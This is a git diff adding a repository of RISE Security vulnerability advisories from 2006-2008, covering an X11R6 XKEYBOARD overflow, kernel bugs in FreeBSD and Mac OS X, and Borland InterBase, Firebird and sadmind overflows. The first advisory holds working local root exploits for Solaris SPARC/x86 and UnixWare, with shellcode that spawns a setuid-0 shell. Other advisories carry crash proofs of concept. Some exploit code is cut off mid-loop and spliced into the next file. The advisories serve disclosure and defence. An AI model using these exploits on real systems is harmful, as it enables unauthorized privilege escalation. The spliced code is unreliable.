diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml new file mode 100644 index 0000000..bdeefa3 --- /dev/null +++ b/.github/workflows/build.yml @@ -0,0 +1,60 @@ +name: build + +on: + push: + branches: main + + workflow_dispatch: + +jobs: + build: + name: Build + runs-on: ubuntu-latest + + steps: + - name: Checkout + uses: actions/checkout@v3 + + - name: Setup Ruby + uses: ruby/setup-ruby@v1 + + - name: Setup Pages + uses: actions/configure-pages@v1 + + - name: Build + run: | + touch -a README.md + rm README.md + bundle install + bundle exec jekyll build + cp _site/README.md README.md + + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + + - name: Commit + run: | + git config --global user.email "rcvalle@users.noreply.github.com" + git config --global user.name "Ramon de C Valle" + git add -A + git commit -m "Auto commit changes" || true + git push origin main + + deploy: + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + + name: Deploy + needs: build + + permissions: + id-token: write + pages: write + + runs-on: ubuntu-latest + + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..2e52d75 --- /dev/null +++ b/.gitignore @@ -0,0 +1,6 @@ +.bundle +.jekyll-cache +.sass-cache +Gemfile.lock +_site +vendor diff --git a/.ruby-version b/.ruby-version new file mode 100644 index 0000000..eb39e53 --- /dev/null +++ b/.ruby-version @@ -0,0 +1 @@ +3.3 diff --git a/Gemfile b/Gemfile new file mode 100644 index 0000000..167ee20 --- /dev/null +++ b/Gemfile @@ -0,0 +1,2 @@ +source 'https://rubygems.org' +gem 'jekyll' diff --git a/RISE-2006001.txt b/RISE-2006001.txt new file mode 100644 index 0000000..508b53c --- /dev/null +++ b/RISE-2006001.txt @@ -0,0 +1,451 @@ +RISE-2006001 +X11R6 XKEYBOARD extension Strcmp() buffer overflow vulnerability + +Released: September 07, 2006 +Last updated: September 07, 2006 + +INTRODUCTION + +There exists a vulnerability within a string manipulation function of the X11R6 +(X11R6.4 and lower) X Window System library, which when properly exploited can +lead to local compromise of the vulnerable system. +This vulnerability was silently fixed in X11R6.5.1 release, but it is still +present in multiple vendors operating systems source tree. +This vulnerability was confirmed by us in the following versions and operating +systems, other versions and operating systems may be also affected. + +Sun Solaris 10 SPARC/x86 +Sun Solaris 9 SPARC/x86 +Sun Solaris 8 SPARC/x86 +SCO UnixWare 7.1.3 + +DETAILS + +This vulnerability can be triggered by invoking a dynamicaly linked binary, with +_XKB_CHARSET environment variable set to a long string value, and DISPLAY +environment variable set to a X Window System server with the XKEYBOARD +extension enabled. +This is the vulnerable function (from X11R6.4). + +static int +#if NeedFunctionPrototypes +Strcmp(char *str1, char *str2) +#else +Strcmp(str1, str2) + char *str1, *str2; +#endif +{ + char str[256]; + char c, *s; + + for (s = str; c = *str1++; ) { + if (isupper(c)) + c = tolower(c); + *s++ = c; + } + *s = '\0'; + return (strcmp(str, str2)); +} + +The proof of concept codes we have written for this vulnerability can be found +in appendix section of this document. +All source codes from this document can be also downloaded from our website. +http://www.risesecurity.org/ + +VENDOR + +Sun has released patches for this vulnerability, the Sun Alert ID is 102570 +and it is available at the following URL: +http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1 +SCO did not answer to our email. + +CREDITS + +This vulnerability was discovered by Adriano Lima and +Filipe Balestra . + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any information +provided, including any kind of information which is incomplete or incorrect, +will therefore be rejected. + +APPENDIX + +sol-sparc-xkb.c + +/* + * X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC + * Copyright 2006 RISE Security , + * Ramon de Carvalho Valle + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + * + */ + +/* + * Compile with the following command. + * $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c + * + * Set the DISPLAY environment variable to a X Window System server with + * XKEYBOARD extension enabled. + * $ ./sol-sparc-xkb sprintf|strcpy xserver:display + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 13+256+64+2+1 +#define FRMSIZE 64+3+1 +#define ADRSIZE 2047+1 +#define SHLSIZE strlen(shellcode)+1 +#define DSPSIZE strlen(display)+1 +#define ARGSIZE 7+1 +#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE +#define PFMSIZE strlen(platform)+1 +#define PRGSIZE 20+1 + +#define PAD(a,b,c) \ + a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4); + +char shellcode[]= /* 60 bytes */ + "\x90\x1a\x40\x09" /* xor %o1,%o1,%o0 */ + "\x82\x10\x20\x17" /* mov 0x17,%g1 */ + "\x91\xd0\x20\x08" /* ta 0x08 */ + "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l0 */ + "\xa0\x14\x29\x6e" /* or %l0,0x96e,%l0 */ + "\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l1 */ + "\x90\x23\xa0\x08" /* sub %sp,0x08,%o0 */ + "\x92\x23\xa0\x10" /* sub %sp,0x10,%o1 */ + "\x94\x1a\x80\x0a" /* xor %o2,%o2,%o2 */ + "\xe0\x23\xbf\xf8" /* st %l0,[%sp-0x08] */ + "\xe2\x23\xbf\xfc" /* st %l1,[%sp-0x04] */ + "\xd0\x23\xbf\xf0" /* st %o0,[%sp-0x10] */ + "\xc0\x23\xbf\xf4" /* st %g0,[%sp-0x0c] */ + "\x82\x10\x20\x3b" /* mov 0x3b,%g1 */ + "\x91\xd0\x20\x08" /* ta 0x08 */ +; + +void *find_symbol(const char *symbol){ + void *handle,*addr; + char *err; + + if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){ + fprintf(stderr,"%s\n",dlerror()); + exit(EXIT_FAILURE); + } + + dlerror(); + addr=dlsym(handle,symbol); + if((err=dlerror())!=NULL){ + fprintf(stderr,"%s\n",err); + exit(EXIT_FAILURE); + } + + dlclose(handle); + + return addr; +} + +void *find_rwxmem(void){ + FILE *fp; + prmap_t map; + int flags; + void *addr; + + if((fp=fopen("/proc/self/map","rb"))==NULL){ + perror("fopen"); + exit(EXIT_FAILURE); + } + + while(fread(&map,sizeof(map),1,fp)){ + flags=map.pr_mflags; + + if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){ + if(flags&MA_STACK) continue; + addr=(void *)map.pr_vaddr; + } + } + + fclose(fp); + + return addr; +} + +int main(int argc,char **argv){ + char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p; + int base,offset,i,flag=0; + + printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n"); + printf("Copyright 2006 RISE Security \n\n"); + + if(argc!=3){ + fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + if(!strcmp(argv[1],"sprintf")) flag=1; + if(!strcmp(argv[1],"strcpy")) flag=2; + + if(!flag){ + fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]); + + if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){ + perror("sysinfo"); + exit(EXIT_FAILURE); + } + + base=((int)argv[0]|0xffff); + base++; + + offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE; + PAD(offset,1,sizeof(envp)-1); + + *((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE; + *((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE; + *((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE; + + switch(flag){ + case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break; + case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4; + } + + *((int *)addr[4])=(int)find_rwxmem()+4; + *((int *)addr[5])=*((int *)addr[4])-8; + + p=buf; + sprintf(p,"_XKB_CHARSET="); + p=buf+13; + for(i=0;i<256;i++) *p++='A'; + for(i=0;i<66;i++) *p++=addr[1][i%4]; + *p='\0'; + + memcpy(buf+13+256+56,addr[0],4); + memcpy(buf+13+256+60,addr[3],4); + + p=buf+1024;; + for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4]; + *p='\0'; + + memcpy(buf+1024+32,addr[4],4); + memcpy(buf+1024+36,addr[2],4); + memcpy(buf+1024+60,addr[5],4); + + p=buf+2048; + for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4]; + *p='\0'; + + envp[0]=&buf[0]; + envp[1]=&buf[1024]; + envp[2]=&buf[2048]; + envp[3]=shellcode; + envp[4]=display; + envp[5]=NULL; + + execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp); + + exit(EXIT_FAILURE); +} + +sol-x86-xkb.c + +/* + * X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86 + * Copyright 2006 RISE Security , + * Ramon de Carvalho Valle + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + * + */ + +#include +#include +#include +#include + +#define ADRSIZE 1024 +#define NOPSIZE 4096 + +char shellcode[]= /* 47 bytes */ + "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */ + "\x6a\x65" /* pushl $0x65 */ + "\x89\xe6" /* movl %esp,%esi */ + "\xf7\x56\x04" /* notl 0x04(%esi) */ + "\xf6\x16" /* notb (%esi) */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\xb0\x17" /* movb $0x17,%al */ + "\xff\xd6" /* call *%esi */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68\x2f\x6b\x73\x68" /* pushl $0x68736b2f */ + "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\x89\xe1" /* movl %esp,%ecx */ + "\x50" /* pushl %eax */ + "\x51" /* pushl %ecx */ + "\x53" /* pushl %ebx */ + "\xb0\x3b" /* movb $0x3b,%al */ + "\xff\xd6" /* call *%esi */ +; + +int main(int argc,char **argv){ + char buf[8192],display[256],addr[4],*envp[4],*p; + int i; + + printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n"); + printf("Copyright 2006 RISE Security \n\n"); + + if(argc!=2){ + fprintf(stderr,"usage: %s xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]); + + *((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1; + + p=buf; + sprintf(p,"_XKB_CHARSET="); + p=buf+13; + for(i=0;i<256;i++) *p++='A'; + for(i=0;i, + * Ramon de Carvalho Valle + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + * + */ + +#include +#include +#include +#include + +#define ADRSIZE 1024 +#define NOPSIZE 4096 + +char shellcode[]= /* 43 bytes */ + "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */ + "\x6a\x65" /* pushl $0x65 */ + "\x89\xe6" /* movl %esp,%esi */ + "\xf7\x56\x04" /* notl 0x04(%esi) */ + "\xf6\x16" /* notb (%esi) */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\xb0\x17" /* movb $0x17,%al */ + "\xff\xd6" /* call *%esi */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ + "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\xb0\x3b" /* movb $0x3b,%al */ + "\xff\xd6" /* call *%esi */ +; + +int main(int argc,char **argv){ + char buf[8192],display[256],addr[4],*envp[4],*p; + int i; + + printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n"); + printf("Copyright 2006 RISE Security \n\n"); + + if(argc!=2){ + fprintf(stderr,"usage: %s xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]); + + *((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1; + + p=buf; + sprintf(p,"_XKB_CHARSET="); + p=buf+13; + for(i=0;i<256;i++) *p++='A'; + for(i=0;itd_proc->p_md; +484 struct proc_ldt *pldt = 0; +485 struct i386_ldt_args ua, *uap = &ua; +486 union descriptor *descs, *dp; +487 int descs_size; +488 +489 if ((error = copyin(args, uap, sizeof(struct i386_ldt_args))) < 0) +490 return(error); +491 +492 #ifdef DEBUG +493 printf("i386_set_ldt: start=%d num=%d descs=%p\n", +494 uap->start, uap->num, (void *)uap->descs); +495 #endif +496 +497 if (uap->descs == NULL) { +498 /* Free descriptors */ +499 if (uap->start == 0 && uap->num == 0) { +500 /* +501 * Treat this as a special case, so userland needn't +502 * know magic number NLDT. +503 */ +504 uap->start = NLDT; +505 uap->num = MAX_LD - NLDT; +506 } +507 if (uap->start <= LUDATA_SEL || uap->num <= 0) +508 return (EINVAL); +509 mtx_lock_spin(&sched_lock); +510 pldt = mdp->md_ldt; +511 if (pldt == NULL || uap->start >= pldt->ldt_len) { +512 mtx_unlock_spin(&sched_lock); +513 return (0); +514 } +515 largest_ld = uap->start + uap->num; +516 if (largest_ld > pldt->ldt_len) +517 largest_ld = pldt->ldt_len; +518 i = largest_ld - uap->start; +519 bzero(&((union descriptor *)(pldt->ldt_base))[uap->start], +520 sizeof(union descriptor) * i); +521 mtx_unlock_spin(&sched_lock); +522 return (0); +523 } +524 +525 if (!(uap->start == LDT_AUTO_ALLOC && uap->num == 1)) { +526 /* complain a for a while if using old methods */ +527 if (ldt_warnings++ < NUM_LDT_WARNINGS) { +528 printf("Warning: pid %d used static ldt allocation.\n", +529 td->td_proc->p_pid); +530 printf("See the i386_set_ldt man page for more info\n"); +531 } +532 /* verify range of descriptors to modify */ +533 largest_ld = uap->start + uap->num; +534 if (uap->start >= MAX_LD || +535 uap->num < 0 || largest_ld > MAX_LD) { +536 return (EINVAL); +537 } +538 } +539 +540 descs_size = uap->num * sizeof(union descriptor); +541 descs = (union descriptor *)kmem_alloc(kernel_map, descs_size); +542 if (descs == NULL) +543 return (ENOMEM); +544 error = copyin(uap->descs, descs, descs_size); +545 if (error) { +546 kmem_free(kernel_map, (vm_offset_t)descs, descs_size); +547 return (error); +548 } +549 + +A little proof of concept code that triggers this vulnerability can be found +in appendix section of this document. + +VENDOR + +Vendor was notified, as this is not a critical vulnerability, proper corrections +should be available soon. + +CREDITS + +This vulnerability was discovered by Adriano Lima , +further research by Rodrigo Rubira Branco . + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any information +provided, including any kind of information which is incomplete or incorrect, +will therefore be rejected. + +APPENDIX + +bsd-x86-ldt.c + +#include +#include +#include +#include + +int main(int argc,char **argv){ + + if(i386_set_ldt(LUDATA_SEL+1,NULL,-1)==-1){ + perror("i386_set_ldt"); + exit(EXIT_FAILURE); + } + + exit(EXIT_FAILURE); +} + diff --git a/RISE-2007001.txt b/RISE-2007001.txt new file mode 100644 index 0000000..87ce978 --- /dev/null +++ b/RISE-2007001.txt @@ -0,0 +1,121 @@ +RISE-2007001 +Apple Mac OS X 10.4.x kernel shared_region_map_file_np() memory corruption +vulnerability + +Released: January 19, 2007 +Last updated: January 19, 2007 + +INTRODUCTION + +There exists a vulnerability within a function of the Apple Mac OS X 10.4.x +kernel (Apple Mac OS X 1.4.8 and lower), which when properly exploited can lead +to local compromise of the vulnerable system. +This vulnerability was confirmed by us in the up-to-date Apple Mac OS X 1.4.8 +(8L2127). + +DETAILS + +The kernel provides a mechanism for system-wide memory sharing, the Shared +Memory Server subsystem. Using this facility, both the kernel and user programs +can share code and data among all tasks on the system. It is also possible to +give one or more tasks private versions of the shared memory. + +shared_region_map_file_np() is used by dyld to map parts of a split-segment +library in the global shared read-only and read-write regions. dyld parses the +load commands in the library file and prepares an array of shared region mapping +structures, each of which specifies the address, size, and protection values of +a single mapping. It passes this array along with an open file descriptor for +the library to shared_region_map_file_np(), which attempts to establish each of +the requested mappings. shared_region_map_file_np() also takes as an argument a +pointer to an address variable: If the pointer is non-NULL and the requested +mappings cannot fit in the target address space as desired, the kernel will +attempt to slide (move around) the mappings to make them fit. The resultant +slide value is returned in the address variable. If the pointer is NULL instead, +the call returns an error without attempting to slide. + +This vulnerability can be triggered by calling the shared_region_map_file_np() +system call with a high mapping_count value, which due to lack of bounds +checking will result in the consumption of all available operating system +resources. +This is part of the vulnerable function from Apple Mac OS X 1.4.8. + + /* + * Get the list of mappings the caller wants us to establish. + */ + mapping_count = uap->mappingCount; /* the number of mappings */ + mappings_size = (vm_size_t) (mapping_count * sizeof (mappings[0])); + if (mapping_count == 0) { + SHARED_REGION_TRACE( + SHARED_REGION_TRACE_INFO, + ("shared_region: %p [%d(%s)] map_file(%p:'%s'): " + "no mappings\n", + current_thread(), p->p_pid, p->p_comm, + vp, vp->v_name)); + error = 0; /* no mappings: we're done ! */ + goto done; + } else if (mapping_count <= SFM_MAX_STACK) { + mappings = &stack_mappings[0]; + } else { + if ((mach_vm_size_t) mappings_size != + (mach_vm_size_t) mapping_count * sizeof (mappings[0])) { + /* 32-bit integer overflow */ + error = EINVAL; + goto done; + } + kr = kmem_alloc(kernel_map, + (vm_offset_t *) &mappings, + mappings_size); + +A little proof of concept code that triggers this vulnerability can be found +in appendix section of this document. + +VENDOR + +Vendor was notified, as this is not a critical vulnerability, proper corrections +should be available soon. + +CREDITS + +This vulnerability was discovered by Adriano Lima . + +REFERENCES + +[1] Mac OS X Internals: A Systems Approach By Amit Singh + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any information +provided, including any kind of information which is incomplete or incorrect, +will therefore be rejected. + +APPENDIX + +osx-x86-shared.c + +#include +#include +#include +#include +#include + +int main(int argc,char **argv){ + int fd; + + if((fd=open("/usr/lib/libSystem.dylib",O_RDONLY))==-1){ + perror("open"); + exit(EXIT_FAILURE); + } + + if(syscall(SYS_shared_region_map_file_np,fd,0x02000000,NULL,NULL)==-1){ + perror("shared_region_map_file_np"); + exit(EXIT_FAILURE); + } + + exit(EXIT_FAILURE); +} + + +$Id: RISE-2007001.txt 3 2007-01-19 23:07:37Z ramon $ + diff --git a/RISE-2007002.txt b/RISE-2007002.txt new file mode 100644 index 0000000..ba2d9fd --- /dev/null +++ b/RISE-2007002.txt @@ -0,0 +1,84 @@ +Borland InterBase Multiple Buffer Overflow Vulnerabilities + +http://risesecurity.org/advisory/RISE-2007002/ + +Published: October 3, 2007 +Updated: October 3, 2007 + +INTRODUCTION + +There exists multiple vulnerabilities within functions of Borland InterBase, +which when properly exploited can lead to remote compromise of the vulnerable +system. +These vulnerabilities were confirmed by us in the following versions of Borland +InterBase, other versions may be also affected. + +Borland InterBase WI-V8.1.0.257 +Borland InterBase WI-V8.0.0.123 +Borland InterBase WI-V7.5.1.80 +Borland InterBase WI-V7.5.0.129 +Borland InterBase WI-V7.0.1.1 +Borland InterBase WI-V6.5.0.28 +Borland InterBase WI-V6.0.1.6 +Borland InterBase WI-O6.0.2.0 +Borland InterBase WI-O6.0.1.6 +Borland InterBase WI-V6.0.1.0 +Borland InterBase WI-V6.0.0.627 +Borland InterBase WI-V5.5.0.742 +Borland InterBase WI-V5.1.1.680 +Borland InterBase LI-V8.1.0.253 +Borland InterBase LI-V8.0.0.54 +Borland InterBase LI-V8.0.0.53 + +DETAILS + +The vulnerable functions do not validate user supplied data when copying it to a +stack-based buffer, resulting in a stack-based buffer overflow. The exploitation +of these vulnerabilities are trivial and results in remote compromise of the +vulnerable system. + +This is the list of vulnerable functions, some of them contain more than one +stack-based buffer overflow vulnerability. + +1. INET_connect +2. SVC_attach +3. isc_attach_database +4. jrd8_attach_database +5. isc_create_database +6. jrd8_create_database +7. PWD_db_aliased +8. expand_filename2 +9. open_marker_file (UNIX only) + +These vulnerabilities can be triggered by sending specially crafted attach, +create and service attach requests. + +Proof of concept codes for these vulnerabilities can be downloaded from our +website http://risesecurity.org/. + +VENDOR + +Vendor was notified, but did not answer to our reports. Proper corrections +should be available soon. + +CREDITS + +These vulnerabilities were discovered by Adriano Lima +and Ramon de Carvalho Valle . + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any information +provided, including any kind of information which is incomplete or incorrect, +will therefore be rejected. + +APPENDIX + +Proof of concept codes for these vulnerabilities can be downloaded from our +website http://risesecurity.org/. + + +$Id: RISE-2007002.txt 10 2007-10-04 00:58:59Z ramon $ + diff --git a/RISE-2007003.txt b/RISE-2007003.txt new file mode 100644 index 0000000..06e4e41 --- /dev/null +++ b/RISE-2007003.txt @@ -0,0 +1,71 @@ +Firebird Relational Database Multiple Buffer Overflow Vulnerabilities + +http://risesecurity.org/advisory/RISE-2007003/ + +Published: October 3, 2007 +Updated: October 3, 2007 + +INTRODUCTION + +There exists multiple vulnerabilities within functions of Firebird Relational +Database, which when properly exploited can lead to remote compromise of the +vulnerable system. +These vulnerabilities were confirmed by us in the following versions of Firebird +Relational Database, other versions may be also affected. + +Firebird WI-V2.0.1.12855 +Firebird WI-V2.0.0.12748 +Firebird WI-V1.5.4.4910 +Firebird WI-V1.5.3.4870 +Firebird LI-V2.0.1.12855 +Firebird LI-V2.0.0.12748 +Firebird LI-V1.5.4.4910 +Firebird LI-V1.5.3.4870 + +DETAILS + +The vulnerable functions do not validate user supplied data when copying it to a +stack-based buffer, resulting in a stack-based buffer overflow. The exploitation +of these vulnerabilities are trivial and results in remote compromise of the +vulnerable system. + +This is the list of vulnerable functions, some of them contain more than one +stack-based buffer overflow vulnerability. + +1. INET_connect (Firebird 1.5) +2. SVC_attach (Firebird 1.5) +3. isc_attach_database (Firebird 2.0) +4. isc_create_database (Firebird 2.0) + +These vulnerabilities can be triggered by sending specially crafted attach, +create and service attach requests. + +Proof of concept codes for these vulnerabilities can be downloaded from our +website http://risesecurity.org/. + +VENDOR + +The vulnerabilities 1 and 2 were cerrected in Firebird XX-V2.0.0.12748, 3 and 4 +were corrected in Firebird XX-V2.0.3.12981. + +CREDITS + +These vulnerabilities were discovered by Adriano Lima +and Ramon de Carvalho Valle . + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any information +provided, including any kind of information which is incomplete or incorrect, +will therefore be rejected. + +APPENDIX + +Proof of concept codes for these vulnerabilities can be downloaded from our +website http://risesecurity.org/. + + +$Id: RISE-2007003.txt 10 2007-10-04 00:58:59Z ramon $ + diff --git a/RISE-2007004.txt b/RISE-2007004.txt new file mode 100644 index 0000000..5b65fc4 --- /dev/null +++ b/RISE-2007004.txt @@ -0,0 +1,178 @@ +Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow Vulnerability + +http://risesecurity.org/advisory/RISE-2007004/ +Published: November 16, 2007 +Updated: November 16, 2007 + +INTRODUCTION + +There exists a vulnerability within an architecture dependent function of the +Apple Mac OS X 10.4.x kernel, which when properly exploited can lead to local +compromise of the vulnerable system. +This vulnerability was confirmed by us in the following versions of the Apple +operating system, other versions may be also affected. + +Apple Mac OS X 10.4.10 +Apple Mac OS X 10.4.9 +Apple Mac OS X 10.4.8 +Apple Mac OS X Server 10.4.10 +Apple Mac OS X Server 10.4.9 +Apple Mac OS X Server 10.4.8 + +DETAILS + +The i386_set_ldt() system call will set a list of i386 descriptors for the +current process in its LDT. It accepts a starting selector number start_sel, an +array of memory that will contain the descriptors to be set descs, and the +number of entries to set num_sels. + +int +i386_set_ldt( + int *retval, + uint32_t start_sel, + uint32_t descs, /* out */ + uint32_t num_sels) +{ + user_ldt_t new_ldt, old_ldt; + struct real_descriptor *dp; + unsigned int i; + unsigned int min_selector = LDTSZ_MIN; /* do not allow the +system selectors to be changed */ + task_t task = current_task(); + unsigned int ldt_count; + kern_return_t err; + +The vulnerable function does not validate the number of entries to set num_sels +properly. When setting a valid integer value as starting selector number +start_sel, and a integer value higher than 0xffffffff - start_sel as number of +entries to set num_sels, it results in a integer overflow in start_sel + +num_sels expression, with its value being lower than LDTSZ. + + if (start_sel != LDT_AUTO_ALLOC + && (start_sel != 0 || num_sels != 0) + && (start_sel < min_selector || start_sel >= LDTSZ)) + return EINVAL; + if (start_sel != LDT_AUTO_ALLOC + && start_sel + num_sels > LDTSZ) + return EINVAL; + +A new LDT is allocated using the kalloc() function, with its size argument being +sizeof(struct user_ldt) + (ldt_count * sizeof(struct real_descriptor)). + + /* + * Allocate new LDT + */ + + unsigned int begin_sel = start_sel; + unsigned int end_sel = begin_sel + num_sels; + + if (old_ldt != NULL) { + if (old_ldt->start < begin_sel) + begin_sel = old_ldt->start; + if (old_ldt->start + old_ldt->count > end_sel) + end_sel = old_ldt->start + old_ldt->count; + } + + ldt_count = end_sel - begin_sel; + + new_ldt = (user_ldt_t)kalloc(sizeof(struct user_ldt) + (ldt_count * +sizeof(struct real_descriptor))); + if (new_ldt == NULL) { + task_unlock(task); + return ENOMEM; + } + + new_ldt->start = begin_sel; + new_ldt->count = ldt_count; + +When installing the new descriptors, the contents of memory pointed to by descs +are copied into the new allocated LDT using the copyin() function, with its size +argument being num_sels * sizeof(struct real_descriptor). This operation results +in a buffer overflow in the new allocated LDT. + + /* + * Install new descriptors. + */ + if (descs != 0) { + err = copyin(descs, (char *)&new_ldt->ldt[start_sel - begin_sel] +, + num_sels * sizeof(struct real_descriptor)); + if (err != 0) + { + task_unlock(task); + user_ldt_free(new_ldt); + return err; + } + +A proof of concept code that triggers this vulnerability can be found in +appendix section of this document. + +VENDOR + +Apple corrected this vulnerability in Apple Mac OS X 10.4.11. More information +is available at http://docs.info.apple.com/article.html?artnum=307041 + + +CREDITS + +This vulnerability was discovered by Adriano Lima and +Ramon de Carvalho Valle . + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any information +provided, including any kind of information which is incomplete or incorrect, +will therefore be rejected. + +APPENDIX + +osx-x86-ldt.c + +#include +#include +#include +#include +#include +#include +#include + +int +main(void) +{ + union ldt_entry descs; + char *buf; + u_long pgsz = sysconf(_SC_PAGESIZE); + + if ((buf = (char *)malloc(pgsz * 4)) == -1) { + perror("malloc"); + exit(EXIT_FAILURE); + } + + memset(buf, 0x41, pgsz * 4); + + buf = (char *)(((u_long)buf & ~pgsz) + pgsz); + + if (mprotect((char *)((u_long)buf + (pgsz * 2)), (size_t)pgsz, + PROT_WRITE) == -1) { + perror("mprotect"); + exit(EXIT_FAILURE); + } + + /* + * This will result in kalloc() size argument being 0x00000000 and copyin() + * size argument being 0xfffffff8. + */ + + if (i386_set_ldt(1024, (union ldt_entry *)&buf, -1) == -1) { + perror("i386_set_ldt"); + exit(EXIT_FAILURE); + } + + exit(EXIT_SUCCESS); +} + + +$Id: RISE-2007004.txt 13 2007-11-16 02:58:56Z ramon $ + diff --git a/RISE-2008001.txt b/RISE-2008001.txt new file mode 100644 index 0000000..f43e3d6 --- /dev/null +++ b/RISE-2008001.txt @@ -0,0 +1,134 @@ +RISE-2008001 +Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability + +http://risesecurity.org/advisories/RISE-2008001.txt +Published: October 14, 2008 +Updated: November 16, 2008 + +INTRODUCTION + +There exists a vulnerability within a function of the Sun Solstice AdminSuite +sadmind, which when properly exploited can lead to remote compromise of the +vulnerable system. +This vulnerability was confirmed by us in the following versions of the Sun +operating system, other versions may be also affected. + +Sun Solaris 9 SPARC +Sun Solaris 9 x86 +Sun Solaris 8 SPARC +Sun Solaris 8 x86 + +DETAILS + +Solstice AdminSuite is a collection of graphical user interface tools and +commands used to perform administrative tasks such as managing users, groups, +hosts, system files, printers, disks, file systems, terminals, and modems. + +The distributed system administration daemon (sadmind) is the daemon used by +Solstice AdminSuite applications to 